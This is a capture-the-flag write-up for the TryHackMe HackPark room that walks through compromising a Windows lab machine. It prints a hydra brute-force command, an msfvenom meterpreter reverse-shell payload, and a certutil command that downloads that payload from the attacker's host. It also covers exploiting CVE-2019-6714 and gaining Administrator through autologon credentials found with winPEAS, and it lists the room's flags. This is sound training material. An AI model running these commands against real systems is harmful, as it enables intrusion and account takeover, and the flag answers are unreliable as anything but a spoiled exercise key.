HackPark Writeup - TryHackMe

HackPark Writeup - TryHackMe

The Unintended Way?

This is a writeup for the HackPark room, available on the TryHackMe.

If you look through the scheduled tasks on the target system, you might find a task that has either lost its binary or is using a binary that you can change. The scheduled job must be set to execute by an user account with a higher privilege level than the one you now have in order for this method to operate. However, in this walkthrough, I use a different approach to elevate my privileges.

Introduction

Room Description

This room will cover brute-forcing an account's credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.

Notes & Observations

  • The Unintended Way: I discovered autologin credentials and used them to connect to the machine through RDP as Administrator.
  • RCE is possible due to a known vulnerability in the blog engine.
  • A misconfiguration of Windows Scheduler results in privilege escalation (not presented in this writeup).
  • On Windows Machines, I frequently utilise the C:\Windows\Tasks folder for fishy deals and file uploads.

Walkthrough

This chapter contains the all the steps necessary to answer the questions in this room.

Whats the name of the clown displayed on the homepage?

Answer: pennywise

  1. Google clown in the IT film, or something like that: image.png

What request type is the Windows website login form using?

Answer: POST

  1. Open browser and go the machine's IP address.
  2. Find the login page /Account/login.aspx?ReturnURL=/admin/: image.png
  3. Open the DEV tools in the browser and try out some random credentials: 2022-04-14 21_00_05-KaliZ - VMware Workstation 16 Player (Non-commercial use only).png
  4. Check the outgoing request and method in DEV tools: 2022-04-14 21_00_43-frequency.py - data-structures-and-algortihms - Visual Studio Code.png

Guess a username, choose a password wordlist and gain credentials to a user account!

Answer: 1qaz2wsx

  1. Prepare a hydra command with http-form-post module based on the content of the POST request from the previous task. Specify the username as admin and use theLogin Failed response to check failed attempts. Add -f parameter to stop the iteration right away when a password was found:
    hydra -l admin -P `locate rockyou.txt` <IP> -V http-form-post '/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=8why9BeDxGeewwI4imjmlt7Bnb3TLyQRvMiqPw%2BgnaXJoWLcFRljfjmYmgpJmGwxDftSU9e6X5HKgJroFIk5M6o%2FWb%2BxsgSbqEaaSNVN7Moj7xvJxsEPUJSvUlGW%2FxfsrK6K%2BAb6zQRFQaVHrDqlRwTrz%2Fq8BDccONoFC7ycDfnrP9eCTBoWUpAiRwv2QPxXoB2EHQkVuTYjR8AVWzVN6vvsAG8x73OMWTOrr7TR%2FRBFPFI9nU%2Bdfii6gQ5roFvVmewsrWn1jko016tLzQGAfcnh07ufyV715%2F4Fp8t6hS3DNc0O5GdbA0VyvFZrXM7V0JZzCgxlKBafgQG%2BFb0HarIMOvHzBKW3TZ5H7CiejLaeIU97&__EVENTVALIDATION=C7Z%2BBjTp4uvotdQOHfr1Zt0newDoDu8u%2FhkojS9anlkwyxNxxpYljBFnPBMuEu0m%2FZ3wnLbtleHks9mi1ijuaaEzA%2B2VaaeSMgobCtwN5j8MMgn%2FGOb6JNxMMTCmaQ63bKuHqMIEobJ1kcqwe%2FaIwLaji1VITIBkG94kKn1pjpIiuRqb&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed' -f
    

Now you have logged into the website, are you able to identify the version of the BlogEngine?

Answer: 3.3.6.0

  1. Login into the blog engine with admin:1qaz2wsx credentials.
  2. Find the About section and check the version: image.png

What is the CVE?

Answer: CVE-2019-6714

  1. Search for blogengine.net 3.3.6 on the exploit-db.com: image.png

Who is the webserver running as?

Answer: iis apppool\blog

  1. Use this exploit go gain RCE to the machine. The steps are described in the exploit's description. Also, rrepare a netcat listening session to catch a reverse shell.
  2. After gaining access to the machine, run whoami:

image.png

What is the OS version of this windows machine?

Answer: Windows 2012 R2 (6.3 Build 9600)

  1. Create a reverse shell with msfvenom:
    msfvenom -p windows/x64/meterpreter/reverse_tcp  LHOST=<IP> LPORT=<PORT> -f exe -o shell.exe
    
  2. Host the reverse shell on the attacker machine (with e.g. python3 -m http.server). On the target machine go to the c:\Windows\Tasks folder and download the file:
    certutil.exe -urlcache -f http://<IP:PORT>/shell.exe shell.exe
    
  3. Start a listening session in the Metasploit (exploit/multi/handler module) on the attacker machine. Use the same windows/x64/meterpreter/reverse_tcp payload as specified in the reverse shell.
  4. Execute the shell.exe on the target machine.
  5. Catch the Meterpeter shell and run sysinfo command:

image.png

What is the name of the abnormal service running?

Answer: WindowsScheduler

  1. Open a shell session in Meterpreter on the target machine and list running services:
    wmic service list brief | findstr "Running"
    

What is the name of the binary you're supposed to exploit?

Answer: Message.exe

  1. Go to the Windows Scheduler's Events folder:
    cd "c:\Program Files (x86)\SystemScheduler\Events"
    
  2. Check the content of the 20198415519.INI_LOG.txt file:

image.png

What is the user flag (on Jeffs Desktop)?

Answer: 759bd8af507517bcfaede78a21a73e39

  1. Download the latest winPEASx64.exe from Github.
  2. Host this file on your machine and upload it to the target machine by means of Meterpreter's upload command.
  3. On the target machine run winPEASEx64.exe.
  4. It will reveal autologon credentials: administrator:4q6XvFES7Fdxs image.png
  5. If you check the open ports, you'll see that there are running RDP service (port3389):
    nmap 10.10.16.13 -sS -Pn -sV
    
    image.png
  6. Go and login with the credetials (I use Remmina). You are admin now: image.png
  7. Get the user.txt flag at c:\users\jeff\Desktop\user.txt

What is the root flag?

Answer: 7e13d97f05f7ceb9881a3eb3d78d3e72

  1. Get the root.txt flag at c:\users\Administrator\Desktop\root.txt

Using winPeas, what was the Original Install time? (This is date and time)

Answer: 8/3/2019, 10:43:23 AM

  1. Run systeminfo command on the target machine: image.png